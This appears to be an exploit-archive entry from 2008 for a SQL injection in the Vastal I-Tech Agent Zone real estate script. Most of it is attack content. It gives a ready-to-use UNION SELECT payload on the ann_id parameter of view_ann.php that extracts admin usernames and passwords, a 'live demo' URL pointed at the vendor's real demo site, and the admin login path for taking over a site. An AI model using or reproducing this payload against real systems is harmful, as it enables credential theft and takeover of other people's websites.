id: 3602
date: 09/04/2008
title: Vastal I-Tech Agent Zone (ann_id) SQL Injection Vulnerability
author: DeViL iRaQ
cves: 

=============================================================
Vastal I-Tech Agent Zone (ann_id) SQL Injection Vulnerability
=============================================================



#######################################################
# The Real Estate Script ( view_ann.php ) SQL Injection Vulnerability
#
# Author   : DeViL iRaQ
#
# Price     : $399.99 (:
#
# Script Home Page : http://www.vastal.com/agent-zone-real-estate-script.html
#
# Demo      : http://www.vastal.com/real/
#
# Dork      : N/A
########################################################
# Exploit :
# www.[sitename].com/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
#
# Live Demo:
# http://www.vastal.com/real/view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
#
# Admin login :
# http://www.[sitename].com/admin/
#########################################################




#  0day.today [2023-03-25]  #